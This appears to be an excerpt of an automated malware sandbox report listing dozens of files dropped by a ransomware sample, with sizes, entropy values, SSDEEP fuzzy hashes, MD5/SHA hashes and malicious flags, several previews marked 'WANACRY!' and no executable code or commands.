                                SHA-512:68DC2FFAC7A0BEE938BB0148A066190EE791AE83C40858B558B1731B371D65D23994251D76EA0FD58F57CBBE2CACCA97331DBAB776F2A8A47EE64B0C4FDD5E9C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41416
                                Entropy (8bit):7.994988468993542
                                Encrypted:true
                                SSDEEP:768:3cTOxNi806JWLbi8sLWGRgCijcC8ff0hVgpc3CKiVhwjoKsCufbTROdz8FLwNayA:3nxND06qkP2CocC830h2pcR0ZLfbTRS2
                                MD5:1A187A2B1774759C4DFD6D69AD9009A3
                                SHA1:8A8165EEEE7531423E987266CC2633D56A70B0A4
                                SHA-256:86EBDABA82281471758265080FF1575524FE3D205AE1F87C7DB376F04E1D3F4B
                                SHA-512:8E072025B08128A9273B5963EB2F5EAA2F92D4422FB3388FD2F3E5E63CD865D7E3F33A8597159C12FACA9A5A540FD12B3E4831764433B01846A34FE61724B4ED
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104008
                                Entropy (8bit):7.997942678580585
                                Encrypted:true
                                SSDEEP:3072:GL3S8nOckclagXrWUx0hXPx0lA3/rp9ige:m3kclMUx09Px0aPTg
                                MD5:B305178CA17DD882E9DB6E7CAAE731EC
                                SHA1:D28177762AD36B122E171C948E2F8CD15CA327F3
                                SHA-256:192088425ED9EA531BED8FEC82CAD9D89766E099DF63122745638D3A7BF15936
                                SHA-512:F9A78EF68E24DA9F393A661B0BC6F78803D168A5DD759F8D6BEF6B3D400C07E9D1B56C2A4334CA10B780E07023CC99FFDFDBC4C5B5F46EDE26DE9E9F13962FBD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999115649730841
                                Encrypted:true
                                SSDEEP:3072:In1xZ+e3Ktq8vmFtaOxEhC8dncApiqTVCjeS8vGa9xVTwOIMVrMx9VC69yogSI:I78+FtaOxyvNAqeetLrV8YG/UxT
                                MD5:0C806391C781CA24108D633DA53AD724
                                SHA1:1753FDA421478049A158F3169D61F267DA41272E
                                SHA-256:E1A5B3A39874138919F895AD7A8ABA7C8097C4B87A230EF55AFC461CDC7DD2F8
                                SHA-512:FBD8AF3B085844EE51551DA034A6CB7D8BF1E51715D243D337049209BD251F103C01CFA3D12F3E82A61133E11E570C65569D6C0FAB6E7D6DF7D5B07E01F93397
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.09786583375337
                                Encrypted:false
                                SSDEEP:6:bkERrWjCxH50kLPtUIYMqtEscbU+VpsVI7F/yTqhDKOuY/Dt:bkEYOqkLPtZYrtVquGsTUDKB+t
                                MD5:D75A79CB6759DD3D31C990BB8F657490
                                SHA1:4279763CF53D4A6C1E9F499A1420EE5647EC0AE9
                                SHA-256:F6C8AA2F4D19A218709ABA5D54FF12398AFFCFAC9BC1E064D58449ED896B8281
                                SHA-512:FF9F7DFC0FEDBE9B9EAE3799EF33B2D22A618A2B757CC9FFB7A840B675D0D3FC6EB187BBEB20D960675768E4F6579814C178F18B69A1B58D374476738DBCCA08
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.2074684184520486
                                Encrypted:false
                                SSDEEP:6:bkExiszKbxCo8QmHWvkgUVREFrrim1mDIYw45jksopTDX0hGsT:bkEwmLb2vknREamsD+uksgEfT
                                MD5:55D5C3665574D94441BD4F6CF83D8169
                                SHA1:799620989F23216F184C444FCCB474A552EA71D0
                                SHA-256:3BE1842FD996D12AD0DE5A9B20A3D9EAA523C2236703BC3D030511C03C8DFB38
                                SHA-512:9FA247DF7F9F0D55AEC840F5153F3BC1FC67BD3276121AFDD60BBDCCA4DDC84BB1A4008E4E9571EE02165ADF2D8C06575DF9A5D3353EFAC8651D7CD48B9F2117
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY! (binary data omitted)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999118288275091
                                Encrypted:true
                                SSDEEP:3072:OEL+8IrOKOX/zWDQm7Y8G6YVViHbVWe8tgLWk4emlKxHXhGGi7kI6iDCU8hy0nM3:vK/Vf7Y8G/VVCZWHNl9i3hp4DCBYCA
                                MD5:C491AD13994FFF8A13F7F72403CD0337
                                SHA1:42D496FD32D18218EAD6DD5D5CE19AC0FBC687A4
                                SHA-256:199085E90AB4AD3403089C7E6D7F4FAB9005098D587E1BD0DE04DB901A13B486
                                SHA-512:E54B5102FD343DB95D0056DBB5FB2B8D35D7DD321DEE852B7D2C69B1B54F3301619906D2D7936CFED95C19C52D3214EA69844BB81FCB4AEC30A5DBFCB6614A83
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.112961092603951
                                Encrypted:false
                                SSDEEP:6:bkEX4pWCRGI3U9E9vAro3U5s4Uw9iamjqeYALJ4MDNIV7KX:bkElCMIUe9I8k64Utqe5dDm+
                                MD5:AE51FB844DC2E3A4CA5F26A45EFB46AB
                                SHA1:0D231A6B7666AD55FDE680987FD7995EEC239CE5
                                SHA-256:A68707281DA5C92A1DB5CCB77B8FA69C564CBB08A49CD849AD0400301E2EC9A5
                                SHA-512:62D7C3204E217A1F9593EBC3CFC5E4EE64BAEDA3FFDF01C982CA0B8AC90DB271A0DFBAEB602E3C1A16BA9BFAB4EC09BA2AE4C4757A540453E682D3FEDDC6928A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1783605738076375
                                Encrypted:false
                                SSDEEP:6:bkE/WEl5BW0pND3YqQENewjTq5pBpsjbpNQe4vtjod+6SYPAt8xyR2:bkEbvBDN3pRNhj2BexNQe0tG+6Mw02
                                MD5:BF768219075748E0FB9BBA9395534AE0
                                SHA1:A7E10D197E899AFB5CDD68F8E0820385953BA172
                                SHA-256:8DAF50688815187C042DA75F47E182470AE1EECE96BCF48971545C88F80C3B2C
                                SHA-512:82E3D87454CA230B0952C4C2268ABCDFADA9B4B13F90AC3DE5AABF4979C4CAB30D7683EEB52CEDB8611060260D39BB4AE2D6FF11C483AC9A8E527DC49DEAA5C3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.998670002128212
                                Encrypted:true
                                SSDEEP:3072:vI31M64G72soF8dgIW9wIYU5w73/1DQGg:vI66F7ZdgT9PA/JJg
                                MD5:1874F47A8FEE610C0467190E67DBE79F
                                SHA1:2256FAB3FC2D076B31CE4682EA42D595ADA72680
                                SHA-256:1D3049F2C86EFE2F5AA2542D6C759D0E71F7C722B38DB704AAE1FEFC1A35DBDF
                                SHA-512:E0F095C6A72A06C4EF87CD57FA039A56ECE46FBE07C477004E38C2B0B71EF93350BF0C3B89CE0C5B1ADF01E083203C485E24E3A8DC065E058D229D6112D0B2A5
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.9982652359642055
                                Encrypted:true
                                SSDEEP:3072:L0soBbw6edHW9sltkceFDYFlWDJy9QY7g2eJLcrKJt01Qof8l:LZi0R9kcCYmI9Q2eJLcktoc
                                MD5:42E33FE2EFCA4B88C6EF5EEBE2A24AAB
                                SHA1:39E495B891FFFE7F3946A38CBE3EB526B4B347B7
                                SHA-256:CF682CD928AA0BEE607467D0F4F4E2AFBAE85C56C986FBA5237990D5E94B5133
                                SHA-512:FA46CACB0195EFD14BB0A11114C191CB8F63D65D50737EE7FDE85E23F94A26D31EC4E88BAB915EF0F39F8C12080948EC34F9E7ADCB20965362C70F97C223226F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998126600039099
                                Encrypted:true
                                SSDEEP:3072:JjZcYM49fG0A6+AMpTfAzDh6ekxFM9U2cFsTHO:7cYM0X92wf8FMU2cFs6
                                MD5:F67034C9A704B69876DA4A5B39DD0170
                                SHA1:71E1868C83D677CC847A1422659A7208966AA728
                                SHA-256:8C61A7BF9C58D9ACC26428885311CA3D4A6AD6366AB93A20EDABCE01A1969D42
                                SHA-512:5EAB6385D464BDA7AA7530EA4887AFC32642A31436BBBE4114C97CBA23EF3E9679ADFA77ED33E033B0D08FC1CF9C00A12D0B5394C40AF6C3D0C1144DDAF73B8A
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998502424640496
                                Encrypted:true
                                SSDEEP:1536:SkwxvndN11rj0cIa2T9KCfMfB6V19BZAf3q3gvaJ7D8oXPm+1gVXeXlmNWf1I1uX:SkyXIS2mB6L9ByWJ7DO+1gmlAY1+PgYk
                                MD5:4008F016AA1BE190FA1A788516C2C7E3
                                SHA1:E30B98E19EA91137FCEBF8D8C3046D80114325B1
                                SHA-256:9B66F2B460A2E874A34CA11A3139AD8C9CF458CBC10EF98C17C0322C06DEAB56
                                SHA-512:05B55F9CC7013372E6CE23D12E7C51EEB48A7F87A9495B9985E04C15E08C21F1754F8D77235BBF6290C2EEC686EAD42DD7BBE266E667D5DBB433D630591D3D47
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998505761086846
                                Encrypted:true
                                SSDEEP:3072:ilxfDuGKHHCmdcKE6OcHs5UjS3fVpG7DQ:ilpmPE6Oom9eQ
                                MD5:402DF254DA4CE14676AF08C61D6415C3
                                SHA1:E3E7B1E1EA97863CA1AB10CE235D972102CFCDE1
                                SHA-256:0629B63C824DDEBE755E466D4D63063462E003FB4CFA870CA27ED07E09F8259E
                                SHA-512:B5654D9BDC62B6090BA4B7B4FEE45F2357D8428A52DF688D24F95F95DBDDC6EAF96A75B98D99598CF0DFECFAB5C1A1D6CF67C4EA56D22B974CB1EEDA70C100CF
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.9985587459984195
                                Encrypted:true
                                SSDEEP:3072:l9HlK0QDmmWygJ6pOoLZVL2vOa9aoAScDc1ITlr7U:ldQim3gJ4LilanScUIlU
                                MD5:AA67DD611BE9603A12B8AA6770188F8E
                                SHA1:54A689B97312EB72A7FF43E8A9C924DE869E8E14
                                SHA-256:9CBCAC61524D42DE2314737F49EA148521A6885B29D463D8B5100C694D79EE5A
                                SHA-512:C784FCB02AE384F65AC42564436076FFDF896485D7C740E8408684CEA2F11D3B73C13C4A8951D3A24CD15DC2C288CCA2045A1CC0A578A36026E0CFBE6104830C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998372837712669
                                Encrypted:true
                                SSDEEP:3072:ZQaF1ufXWGbWRbUdMyp/WB1Uej89+bA4IqY1+6P:VKfG1RIGy4J8cbDMx
                                MD5:24A7F07AD15AF8C25BACE944A2BE380E
                                SHA1:3EBF6EBEF7EE01EB6E15A523F6B2A1F53E01405E
                                SHA-256:57486111BCA5E3D113F7B112DECBB1DC80A2FFD37D2565DAEB8D79DE1E0851C3
                                SHA-512:6B931E2AAEEBF864A4432CFE50FF37A83FB21825FA610E1F2D42A765127E806EB80AD33C430163D1C13EC09F3D4EABAE389692D3159810E7244825938ED594AA
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):690472
                                Entropy (8bit):7.999754963596077
                                Encrypted:true
                                SSDEEP:12288:Xh1WaQ3nKUzE7VURHSt9onT/7BmE7+jt3Ng7qywf78sjcc/+/GhP+tPCSS:XfenKUsIyt2nT97oUWyo78EFGehP0PC5
                                MD5:C275AC12AAAD7F98FF27C16A300FE0A6
                                SHA1:6805ED86082F1D95E9738D2844C158E34627E411
                                SHA-256:B708D433FEFD3F67CA722D2E3A43EC61018F56EDD39EE87C6A8F47FAF41EF806
                                SHA-512:2776DCE703F2E5970860B77D4582F265E0612E55966964A24E25B6B846C85CEFEA783C1B2E79495D71EA1EA150DB26314A8C156CB8CC9796A8184611E1971E32
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1816
                                Entropy (8bit):7.8893863653748175
                                Encrypted:false
                                SSDEEP:48:bktlYHHLjRAQ/MLBxrJ1QNjhHOXRXjYijF7LS1xg:o0HBAQ/kt1QFhHoXjHF7O1xg
                                MD5:C83752E071865B62A7F8404DE8BBCA3B
                                SHA1:D16ED73982690F257F09829728A14F697DEAEE71
                                SHA-256:05A89006B47105E4B1711863E6656FAF89E63B0C3B4D7CD5A50D4500C49C7CDC
                                SHA-512:909C7B293FCA8234FFAEF19AF9D80BC08D66AAF6944169DA61ACCC6C10DCAA957B97DBE64FF9DD7A22DA0CE93C757AD72D1AFD95409D70685502B15980D284E2
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):568
                                Entropy (8bit):7.5835049068464615
                                Encrypted:false
                                SSDEEP:12:bkE5hQqpZT9W4QxPVP5Ul6EXtbThlIDqqhzrazLGC5tGpJEgYXfWxJg:bkuZJWHPclzXtOqqhzryGC5tGHJYXf2q
                                MD5:A69BD271E322C28034CCAC204E65CB61
                                SHA1:FD1FEFC6A1A39F7F34001341E6B40662F6AA77F4
                                SHA-256:D56830FFED823992C29450E1F34CFFAE778DD6572CB242A00A3437CD6C7F86A4
                                SHA-512:94C0B2F39EA9EEB80672DB9E7B33954D6E4F3EA0F748F25D8D40EE793995840F593674032E46FADC8C8046A6DA6E3B21EAEE9A72888F1F558E1E20D76DBD5F04
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):364408
                                Entropy (8bit):7.9995417060615415
                                Encrypted:true
                                SSDEEP:6144:U430UbuMaCLGPg5epCBtL4WHM+sKvdiJd3iJNWYdzn110gX0qMkdK14HgDICskHF:UM0w5m0tMWFsdD5YdDjj/M6KGHgDIkSc
                                MD5:E5E298F1AB7346CDC09D3621748E42CA
                                SHA1:71501D3B2885E78A2163384279C3D5C5FAD4B47E
                                SHA-256:869E9AB08BE9478D0568D8F8FB6F9098030F15FFAF224602FDD6D7B716743ED0
                                SHA-512:0A3F4088E8AF6AA2019E5A2C1FB0DBEB5EFD498804E203D5424984EC90FBEFB0F71BC6F0C550A7F757A442E6CC0278D4E041C1673F4BB0D1043487829DC7825C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246312
                                Entropy (8bit):7.999330414347671
                                Encrypted:true
                                SSDEEP:6144:hosEl9iqIE6G+uAooZl/YqHcztbnMrzShN/ZfjWOdcrUQuOdc:BgrJgxV8VMrwbfCjrU6c
                                MD5:C9B509D139422FB08EBF8FB8E8A59E49
                                SHA1:71D8E3C59A2B5891AF0D3EC5003B2836F12924DA
                                SHA-256:825A5C935325026A40F948D6315B6C7892C4DA08E3EACBA94D14EC1F3B7BB14F
                                SHA-512:C8EA366C2549E6F4705537DC7E6244DC0F6614FC6FE464233A8C2DEB2D0467AFE2E5FD065548BEB55413BAC299548479A3F18BA99BFAFBCA0FA065065B34A329
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):273704
                                Entropy (8bit):7.999288419867323
                                Encrypted:true
                                SSDEEP:6144:b3NuIFLpqwg/2zKyIc/Czuf7hZ9ieSv22oPvdZBSiN81uY3U5Se:boIpp74yCzujb9ile2oPv1Si+1uY3de
                                MD5:89E3520491ED4A58058B49AC3FCDC7B2
                                SHA1:E9597A0ECC49369F865E57CDBA9801D8749F7782
                                SHA-256:B79E102C31D31032115DA799E73EF2047C97088E341ED4AADA3E9D2400F02437
                                SHA-512:C219B4B24B23073728CB8E53DAAFDC078A13DD47692A92E7984BB7B7775AB027E537A1C4C207E120027A823E31430EF7465801A2687305F17D5DBC88FCCB36A5
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246824
                                Entropy (8bit):7.999227852254764
                                Encrypted:true
                                SSDEEP:6144:6k1CHEezLw42KVDPP1OsRLQDYYdggEVGSkR3gZsBq/n7sc5EHOr:6kGTXx0YLwYaEdkR3gSBWsc5rr
                                MD5:8876F29EAA76A41DD11ACD91D5BBBD15
                                SHA1:06050170100D27F6CCBC84CDE5E820E8D95554CE
                                SHA-256:74D9E3364080F41F16AA2157292FCF81AD2103585007976E311DB8200B6EF852
                                SHA-512:429A57C5FF4536B88A911FE901EBE8453D281387DC0310087611FC98E64061E71D919917D6225AD99C440D921D9670252015562DBCC6750464E53316CA6B8F08
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55320
                                Entropy (8bit):7.996226975058619
                                Encrypted:true
                                SSDEEP:1536:G1VTwyqTRFRDR8H+6q0Ow6KE6ogc7zt1pg:qTpaDRP6Em
                                MD5:51F5DE08B5EBB5E6DD6C52DA3ECA307D
                                SHA1:0806875482B183B74D4556A36395F34F740F0ECB
                                SHA-256:BC9C6D9A51F2FE2B26B32A9D3872431AAD84ABB73EE44174CE1B994D86C3D409
                                SHA-512:30573A30C40FD5D88ADF277F0AA9F152CFA8A5FC5C4A0372F835A44864CE8BBC801EBB2DC98530D51983893E72E1F76FB1F96B66E0D11ACA58D84887A6DC7C23
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.99326540145318
                                Encrypted:true
                                SSDEEP:384:CX7YeDiWcwGE4wi8Vwd+HgqiHm96/effSu4O3MKrJjD9PU1HFF7U3+hYW4xSdXCT:CoTHIwd+H57uWMyJjK93hYNSc
                                MD5:EC5A11F934EE3C506E344FA2583FED61
                                SHA1:6A7996655731E65ECA60F370CE64221708093BD7
                                SHA-256:DB5CE90812B5020945503B09B98FE323300218A0E2A7C04BFBCEF4D137E62CC8
                                SHA-512:17CF7D87936170CB773E331A68A12F35AD4913D622629CB9A81B4C38AC8223D844A177AE61C9660B2B89AC3C5E2956B6CF3F921B4DE85A3B9A458777C9046ABB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (remainder is encrypted binary data)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.991684795454581
                                Encrypted:true
                                SSDEEP:768:NVErtMNuWIjRHCFLuSi/ZLUardvUPVAYf98JTt:NVMtCHIguSixBB0CAy
                                MD5:F56B3EB69A0931ECFBB4A63944C06D16
                                SHA1:F40283F9E53C66A46F8BF3861B42985F8BF2F274
                                SHA-256:692C568DE560CBA2FBF386918D03482AB68F8BAA3517B38E0A6FE97A900ABE80
                                SHA-512:64BCFCFEBBD62DA4AA9B9217825D35391AFB82C03288399849537567BDA6C728293319495250A295C2A05F907BFDA1958CEA7AB8A3FC4C5D8F5DC639DB0D4E54
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY! (remainder is encrypted binary data)
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.82054758729429
                                Encrypted:false
                                SSDEEP:24:ba9CvlkQ7njPiKJaQb4ngoWMtue9QAEgQlu:OmkQ7njaKJz4Z9QOQlu
                                MD5:D524A0762BF0695AA8F16F780B49AD46
                                SHA1:FF98D8E165CDB60B3F399E38CFFEF2D3A160AF25
                                SHA-256:3E2B096488AE9B37BCC075DC7FF921ADC9F8C6EC740EAE450A823F7DEF0AE30F
                                SHA-512:F2FBA3664D1643AC7027364A9DF96FE55A998BB98EC2E23434CCFC7880BED111C684E52C9E99743626678DC75456A3311CFC0AB2FD1B480AF3474B921E8BD5C5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79464168243227
                                Encrypted:false
                                SSDEEP:24:cwoFHMpZblrHQw5bkdjNEjllbtaRLkRswbMQkvZ:EOZl5SdjNEMB
                                MD5:C34DE4FB2F6C2FB50A9854DD07018C79
                                SHA1:A61961E7AA025657559612B5C8E5DEA261DDC6C9
                                SHA-256:BE70FE8169CC6987116C491DB38453136511740DCC1BD460893FB70EEB4691C8
                                SHA-512:434C8337370392B9648CE2538A1788350D75C6D214383AAA74E9021D596908627EE2EABC5B575190158EDFBD874144590378F58F2EE79EB5957467FD55CD4E2A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796805658692537
                                Encrypted:false
                                SSDEEP:24:RObUjgDAZr44p48g4DTrhsYRQ4QZEXQrBzsItyBY8V3zF4DoldPoPijf:ROb6T48gm523WXCzJtyjdvlmPi7
                                MD5:4947EDCF59AA746A1CD542BD88B3A7E0
                                SHA1:1E6AC68900C039D09271D1CBD656F0A5C8A2A394
                                SHA-256:5128C163E2072D84C1382236D9A859B2D1A920B01F1BFB1FF842DB81FDF324CD
                                SHA-512:C265B0851E6AFF4CFBB311FED68D25DA3AC59559D3DE3EA9A5B39DA5312F9829577469F01FC7349A5E451A7390767A7FE26BB398600EDC6E603038DD8C53B13F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816975207396427
                                Encrypted:false
                                SSDEEP:24:QCJ/LKhCR+TfyDi5hWUYIJ1H/4gqVhRsl+Q8ZV3xXta:DxL+TkKZfgg0gjcta
                                MD5:F7ECD6F0A4F0DC4F6709DB062FF1C1CB
                                SHA1:3922C1DD149179529F42F1EF503F18AECF41406E
                                SHA-256:604F77011900E78218152CF67D86960C20A2F6C8B733CE591FC526A4908ECB86
                                SHA-512:6B7716EED40C70A414AD78EC7900C53B3571706961C1CED115A659475199993AAC0D87213036679C2116F3186FB53D88F0C060D1BF52B4A5D681CBA5BCA158F0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803036648864622
                                Encrypted:false
                                SSDEEP:24:63gosUjTZ7Yqjg+DDRmEPrX8dS/GkcP4ORN9OYMUjE:aTR9VPRmEOBP44N9jMUjE
                                MD5:D380E9430EC3C916615F414F70A99D18
                                SHA1:6489F23BD40C44AE0337423A2DC43CBA6EC84EBB
                                SHA-256:A25196FEED0198DF77D61635729AF0995912FADC6C906E7859888952B781180F
                                SHA-512:BF15FD186486211CC98EF2CEF40B6E66BA6723C8660EC2B5BB42BBFBDFCF55458B4C91DC845D8C5F1C7B4734272601D6C2381C0E8382BBB52731A19F3B984E9E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823508414706776
                                Encrypted:false
                                SSDEEP:24:cSEeJLSdKuxe/9qQvFGOOu815e1nkQC3fd9ZR/H8zi75:cmLrD/gQvFGbL1wtkQsjZq05
                                MD5:E531D7DBB5C2D74868AE5FE3EBD3C215
                                SHA1:79FBB4A5CB79BB2AB8C70C8E5E6E034341BB30AB
                                SHA-256:9A296B59302919774850BCE22244D71429CF412418C126AC6EC6DA1C6AA7F1DB
                                SHA-512:0A6B8D339619BE8130D2B35F42990376214A7B9F71B3B613482197589F37D3012003B93986563CC1DC49A7FF1A8DA10BD4C424E25896F95190E31AEA69F96F0B
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807981005733831
                                Encrypted:false
                                SSDEEP:24:Mcx5jh68dTprtSkqZOL0BbPa9omSj9uzoDkDT:DTTpxShOLOrmSBuzo4P
                                MD5:77205474DC1784F928EE5888A1F646BD
                                SHA1:E68203E0D04FF8087DA3C50FE58CD85DC6400843
                                SHA-256:C40580AF0358D5A521898B82B70030E53A1FC72F1756ADE1FBBFBA7B6D62CAE4
                                SHA-512:6FC11775F7F4F72D42D60A68D98B61B8F4AF581509421BF7954BFD7F67ADA99E132DFF490F97DEEFB61D044243E8AA38295391857FFF22FDF291DCBE7CF1CF28
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.818267296582887
                                Encrypted:false
                                SSDEEP:24:BTmstLBJY0ipGWXYW23pxraT6g6E0wJvq+rBiGmLOXZ:BTL7YdGpWkpu64bg+81IZ
                                MD5:782D4AA1AD11AC86EE6A39F845787541
                                SHA1:CD0637065E7412AB7231805F69244B8DFBC62F18
                                SHA-256:795D3EC64DBD3227ADFC8FE6FF859A4E0DB749EC6F6C5208FC913771B99E4386
                                SHA-512:04726B4FC69B12A19274BEDE741AA47E2519D23EDA5E08FFBA8C0CA3D67C702DBD072A4129BA7B30680868D73EDA391C0ACD3A0335BF0ED460CF132828F642F5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796441820550681
                                Encrypted:false
                                SSDEEP:24:5virJCATcPE2sbbMilfrJdb8dN+3KU8arJfy3R7YfS+pKF4:5vpf82skur78dw6MrJfcCoK
                                MD5:5694350CC437C5B99765EE5F7599A50C
                                SHA1:CAA1B663EFCF02939BF41F4687EBE02B244BD414
                                SHA-256:D83115D6B0E430C989644E71FA544AA03A6FAE1E2C4AB5E52F6F5C258D0B7897
                                SHA-512:1F511800DE2204BE3FB4D2C725A8167F7FB14CA3E85FAD2E8720553A90A24E64C587F746566C63CE34F3CFFA71AA8C6FBA86E231F9B9DDA63D427F2AA52D795C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.795318270694324
                                Encrypted:false
                                SSDEEP:24:XXcQh/o8RhN+hMzWHsrbBdQiloENWo/gwnPphN35rVP9+:XXBTahMzWYbfQ4LEoRnPzJ5JPs
                                MD5:6F7B6A4B9F5378EF0E8174D0A919076E
                                SHA1:FBC1F490620F894EAF6CE435425829BCD1D4ADB5
                                SHA-256:F14ECF9B51D3E440A8AD1438B11B255EB8E0CCBA88F9AC7BE33B61278713F436
                                SHA-512:AEC5CDD086041E34A14E2FE8107DBBD6B3EBE37D087570FEDEAE33C86AEF75994F242F5430104EC7DD5E47BE7FA445E0054B3399FBD1608F35A313655C6B968A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8104928499402515
                                Encrypted:false
                                SSDEEP:24:4+Zr8xJi0CzUmUvWiUJ8+dOel73lP98ggP76a8nIH74:4i8xJRCfVW+dtZ67PBHH74
                                MD5:DFF975324BE65D819D01F7A2688AF7B6
                                SHA1:E1711C87D624B64ADEECB923F76076CC678D0E5E
                                SHA-256:4D40482E3483E2475965DD1C89EF9FF7B58B51EE60DA7B59C445DCE1CA64128B
                                SHA-512:06153A50903DB16B221E344BA361D9BA8A9F923336508E1B0621947D7787C6308732424063714C195440AEC5AE8B2AE58B17D9D6046F747002A9EAAB755711E2
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8006151324953565
                                Encrypted:false
                                SSDEEP:24:53Qj6hHuS8vIY+bH/wzU3L4aqtdOnbTO3CptIfa:5gjNITbYg3L4LYTOSvIC
                                MD5:4B6E762FC13C9E8CAA9FD63655984795
